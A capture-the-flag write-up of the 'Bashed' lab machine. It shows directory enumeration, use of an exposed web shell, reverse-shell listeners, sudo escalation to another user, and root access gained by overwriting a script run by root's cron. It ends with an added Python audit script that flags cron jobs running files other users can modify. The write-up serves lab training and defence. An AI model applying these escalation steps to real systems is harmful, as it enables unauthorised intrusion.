===============================================================
2021/05/01 15:46:31 Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 312] [--> http://10.10.10.68/uploads/]
/php (Status: 301) [Size: 308] [--> http://10.10.10.68/php/]
/images (Status: 301) [Size: 311] [--> http://10.10.10.68/images/]
/index.html (Status: 200) [Size: 7743]
/about.html (Status: 200) [Size: 8193]
/contact.html (Status: 200) [Size: 7805]
/css (Status: 301) [Size: 308] [--> http://10.10.10.68/css/]
/dev (Status: 301) [Size: 308] [--> http://10.10.10.68/dev/]
/js (Status: 301) [Size: 307] [--> http://10.10.10.68/js/]
/config.php (Status: 200) [Size: 0]
/fonts (Status: 301) [Size: 310] [--> http://10.10.10.68/fonts/]
/single.html (Status: 200) [Size: 7477]
http://10.10.10.68/dev/
phpbash.min.php
phpbash.php
www-data@bashed:/var/www/html/dev# whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@bashed:/var/www/html/dev# sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
Let's get our own shell by fetching a reverse shell with wget and catching it with nc
$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.68] 54206
SOCKET: Shell has connected! PID: 1540
whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Since the sudo rule lets www-data run anything as scriptmanager without a password, we can elevate to scriptmanager with either of:
sudo -u scriptmanager /bin/bash    [OR]    sudo -i -u scriptmanager
whoami;id
scriptmanager
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
cd /scripts
ls -la
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 4 2017 .
drwxr-xr-x 23 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py
-rw-r--r-- 1 root root 12 May 1 16:48 test.txt
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
test.txt is rewritten every minute and is owned by root, so test.py is most likely being run from root's cron, while test.py itself is owned (and writable) by scriptmanager.
Because we are scriptmanager, we can overwrite test.py with a Python reverse shell and wait for cron to run it as root.
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.68] 35062
/bin/sh: 0: can't access tty; job control turned off
whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
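The root cause here is a root cron job executing a script that a non-root user owns. The following audit script is an added example (not part of the original writeup or the Bashed box) that flags exactly that pattern: it parses /etc/crontab-style lines, and for every absolute path referenced by a root job, checks the file and its containing directory against `ls -la` output. The crontab line for test.py is an assumption, since the writeup never shows root's crontab; the /scripts listing is copied from the writeup, and the /usr/local/bin control directory is constructed.

```python
import re
from dataclasses import dataclass

# One `ls -la` line: mode, link count, owner, group, size, three date fields
# ("Dec 4 2017" or "May 1 16:48"), then the name. An optional ACL/xattr marker
# after the mode ("+", ".", "@") is tolerated.
LS_LINE = re.compile(
    r"^([-dlbcps][rwxsStT-]{9})[+.@]?\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\d+\s+\S+\s+(.+)$"
)


@dataclass
class Entry:
    mode: str   # e.g. "-rw-r--r--"
    owner: str
    group: str
    name: str


def parse_ls(listing):
    """Turn `ls -la` output into {name: Entry}; '.' is the directory itself."""
    entries = {}
    for line in listing.splitlines():
        m = LS_LINE.match(line.strip())
        if m:
            mode, owner, group, name = m.groups()
            entries[name] = Entry(mode, owner, group, name)
    return entries


def modifiable_by_others(entry, privileged="root"):
    """Reasons a user other than `privileged` could change this entry."""
    reasons = []
    if entry.owner != privileged:
        reasons.append(f"owned by {entry.owner}, not {privileged}")
    if entry.mode[5] == "w" and entry.group != privileged:   # group write bit
        reasons.append(f"group-writable by group {entry.group}")
    if entry.mode[8] == "w":                                  # other write bit
        reasons.append("world-writable")
    return reasons


def cron_commands(crontab):
    """Yield (user, command) from /etc/crontab-style lines (5 time fields, user, command).
    Blank lines, comments and VAR=value lines are skipped; @reboot-style lines are ignored."""
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 6)
        if len(fields) == 7:
            yield fields[5], fields[6]


def audit(crontab, listings, privileged="root"):
    """Return [(path, reason)] for every absolute path referenced by a cron job running
    as `privileged` whose file or containing directory someone else can modify.
    `listings` maps a directory path to its `ls -la` output."""
    findings = []
    for user, command in cron_commands(crontab):
        if user != privileged:
            continue
        for token in command.split():
            if not token.startswith("/"):
                continue
            directory, name = token.rsplit("/", 1)
            directory = directory or "/"
            entries = parse_ls(listings.get(directory, ""))
            if name in entries:
                findings += [(token, r) for r in modifiable_by_others(entries[name], privileged)]
            if "." in entries:   # a writable parent directory lets the file be replaced
                findings += [(token, f"directory {directory} {r}")
                             for r in modifiable_by_others(entries["."], privileged)]
    return findings


# Constructed sample input. The root crontab line is an assumption; the /scripts
# listing reproduces the writeup's `ls -la`; /usr/local/bin is a constructed control.
CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user  command
* * * * * root python /scripts/test.py
*/5 * * * * root /usr/local/bin/backup.sh
* * * * * scriptmanager /scripts/test.py
"""

LISTINGS = {
    "/scripts": """\
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 4 2017 .
drwxr-xr-x 23 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py
-rw-r--r-- 1 root root 12 May 1 16:48 test.txt
""",
    "/usr/local/bin": """\
total 12
drwxr-xr-x 2 root root 4096 Dec 4 2017 .
drwxr-xr-x 10 root root 4096 Dec 4 2017 ..
-rwxr-xr-x 1 root root 120 Dec 4 2017 backup.sh
""",
}

if __name__ == "__main__":
    for path, reason in audit(CRONTAB, LISTINGS):
        print(f"[!] {path}: {reason}")
```

Run against the sample, the audit reports /scripts/test.py three times (the file is owned by scriptmanager, and /scripts is both owned by scriptmanager and group-writable), while backup.sh and the job that runs as scriptmanager produce nothing. The fix the findings point to is the usual one: scripts executed by root's cron must be owned by root, in a root-owned directory, with no group or world write bit.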